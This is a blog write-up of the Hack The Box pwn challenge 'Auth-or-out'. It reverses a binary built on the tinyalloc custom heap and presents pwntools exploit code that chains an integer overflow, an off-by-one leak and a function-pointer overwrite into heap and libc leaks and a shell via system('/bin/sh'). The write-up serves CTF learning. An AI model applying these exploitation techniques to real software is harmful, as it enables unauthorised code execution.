Auth-or-Out - exploiting a custom heap (HTB pwn)

2023-09-11

Introduction

Auth-or-out is a pwn challenge on the Hack The Box platform. After solving it I realised there are no write-ups for it available, and with my desire to finally spin up this blog, I have no reason anymore to procrastinate :)

Let's dive right in!

Initial analysis

The challenge provides us with a linux executable. Running file shows us that we got lucky and the binary is not stripped :D
checksec finds that basically all security mitigations are enabled. cheksec output

Running the program

Running the program provides us with a menu that is very similar many other heap exploitation challenges: there are option to add an entry, remove it, edit it and print it. When adding an entry, you can also add a note of a size that we can specify. We could start by trying to overflowing buffers etc., but I prefer to take a look at the decompiled code first.

Reversing

For this challenge I used Ghidra. With the symbols present, we can easily find and understand the main function.

The first thing that caught my eye is the CustomHeap. 0x3800 bytes are allocated for this data structure, and after zeroing out the allocated memory, ta_init is called to seemingly initiate this custom heap. Look at the list of function we can spot more function related to this custom heap: ta_alloc, ta_free, etc.. Going through these functions you can see that these are not just wrapper function for libc - a custom heap implementation is present in the binary. Before reversing the implementation by hand, I (luckily) had the idea to google some of these function names. One of the first results was a custom heap implementation called tinyalloc. The github has a great documentation of this heap implementation.

The custom heap

The tinyalloc heap implementation consists of three main memory regions. The github contains a nice visualization to better understand the structure.

The three parts are:

  1. The first for addresses on top of the heap struct contain pointers to the 1st used block, 1st free block, 1st fresh block, and the current heap top.
  2. Next, a list heap Blocks is stored. Each block contains the heap address of the block, a pointer to the next block, and the size of the block.
  3. Lastly, the rest of the memory is used for the data that is stored on the heap.


Based on how the heap is implemented, I had some thoughts on possibilities for exploitation:

  • The implementation comes from a decently popular github repo, so I assume it is sound.
  • The user data is stored at higher addresses then where the pointers between blocks, and the sizes of blocks, are stored. This makes it unlikely that we can overwrite any of these values.

Finding vulnerabilities

With the knowledge of the heap in the back of our mind, we can start to look for some potential vulnerabilities.

Parsing input integers

When parsing the input integers provided by the user, the function at 0x101240 is used. Interestingly, it return an unsigned long long (64-bit) value. This might prove to be useful.

Parsing input strings

Input strings are parsed using the function at 0x1012bd. Interestingly, the string is not necessarily null-terminated. This could be used to leak values stored after the string.

Allocating space for the note

This code caught my eye as the order did not seem to make sense. Take a look yourself (code starts at 0x1015a5):

new_note = ta_alloc(input_nr + 1);
new_author->Note = new_note;
if (authors[i]->Note == 0x0) {
    printf("Invalid allocation!");
    exit(0);
}
printf("Note: ");
if (input_nr < 0x101) {
    size = input_nr + 1;
}
else {
    size = 0x100;
}
get_user_input(authors[i]->Note,size);

As you can see, the the buffer gets allocated, and afterward a check is performed on if the size is smaller than 0x101. What is worse, is the addition of 1 to input_nr on the first line, as this can result in a integer overflow.

The print_author function

Looking at the print_author function you can note something interesting:

puts("----------------------");
printf("Author %llu\n",uVar1);
printf("Name: %s\n",author);
printf("Surname: %s\n",author->Surname);
printf("Age: %llu\n",author->Age);
(*author->Print)(author->Note);
puts("-----------------------");
putchar(L'\n');

As you can see, to print the note a function is used for which the address is stored in the author struct. This is similar to a virtual method (wikipedia). This means that if we can overwrite this value in the data structure, we can redirect the code execution.

Modifying authors

The modify_author function reads 1 byte too many when you input the surname. This will allow us to leak the pointer that is the next element of the author structure.

get_user_input(buffer->Surname,0x11)

The author struct

Since I am using this a lot, here a quick overview of the author struct: Author struct

Exploitation

Finally it is time to put it all together and find the flag. I am not going to put my entire exploit script here, just the interesting parts.

Based on the vulnerabilities described above, I created some helper functions, including this function to easily add an author:

Add author

def add(name: str = b'A'*8, surname: str = b'B'*8, age: int=1, size: int=16, note: str=b'A'*16):
    con.sendlineafter(b'Choice: ', b'1')
    con.sendlineafter(b'Name: ', name)
    con.sendlineafter(b'Surname: ', surname)
    con.sendlineafter(b'Age: ', str(age).encode())
    con.sendlineafter(b' size: ', str(size).encode())
    con.sendlineafter(b'Note: ', note)

Leak heap address

Let's get to the real exploit. The first step is to leak the heap address.
The following code abuses the leak that occurs when modifying then last name of an author. Since the surname does not end with a null-byte, the next value in the struct will also be printed, which is the pointer to the note of the author. The note struct is stored directly after the author, so this allow us to calculate the base address of the heap.

def leak_heap():
    clear_heap() # removes any previous entries to ensure we write to the first author
    add()
    modify(id=1, surname = b'A'*16) # change the surname, exploiting the bug
    print_auth(1)
    con.recvuntil(b'A'*16)
    heap = u64(con.recvline()[:-1].ljust(8,b'\0'))
    return heap - 0x38

Arbitrary read

We can achieve an arbitrary read with the following steps:

  1. Add 2 new authors
  2. Delete the first
  3. Add a new author again. This time, set the size of the note to the maximum value of unsigned long long (2^64-1), to abuse the integer overflow when creating the buffer for the note. This author, and the note, are put on the heap at the location of the author that we deleted, so that is in front of the second author. We can now overwrite all the values of the second author. At the location of the note pointer, we put the address that we would like to read from.
  4. Finally, we print author 2.
def arb_read(addr):
    clear_heap()
    add() 
    add()
    delete(1) 
    add(size=MAX_ULL, note=b'A'*24 + b'B'*32 + p64(addr) + b'A'*8) # put the address that we want to 
                                            # read on the location of the note pointer of the second author
    print_auth(2)
    con.recvuntil(b'[')
    leak = u64(con.recvline()[:-2].ljust(8,b'\0'))
    return leak

Leak the binary base

We can now leak the base of the binary by combining the heap leak with the arbitrary read.

heap_base = leak_heap()
log.info(f"Leaked heap address: {hex(heap_base)}")
base_leak = arb_read(heap_base + 0x30) - elf.symbols['PrintNote']
log.info(f"Leaked base address: {hex(base_leak)}")
elf.address = base_leak

Leak libc addresses

Next, we leak the libc addresses from the GOT. With this we can determine the libc version (for example using this libc database)

def leak_libc_addresses():
    got_addr_putchar = elf.got['putchar'] # before running this, make sure elf.address is set correctly
    got_addr_puts = elf.got['puts']
    got_addr_printf = elf.got['printf']
    log.info(f"libc putchar: {hex(arb_read(got_addr_putchar))}")
    log.info(f"libc puts: {hex(arb_read(got_addr_puts))}")
    log.info(f"libc printf: {hex(arb_read(got_addr_printf))}")

    # and after you determined the libc version:
    libc = elf('path/to/libc')
    libc.address = arb_read(got_addr_putchar) - libc.symbols['putchar']

Popping a shell

Now we know the version and base of libc, we only need to pop a shell. Once again, we will overwrite the second author using the same trick as for the arbitrary read. This time however, we will overwrite the note pointer to the start of the heap, where we store the /bin/sh string. Then, we overwrite the function pointer to the system function in libc. Finally, we print the second author and get the shell.

def binsh(heap_base: int):
    clear_heap()
    add()
    add()
    delete(1)
    add(size=MAX_ULL, name=b'/bin/sh\0', note=b'A'*56 + p64(heap_base) + b'A'*8 + p64(libc.symbols['system']))
    print_auth(2)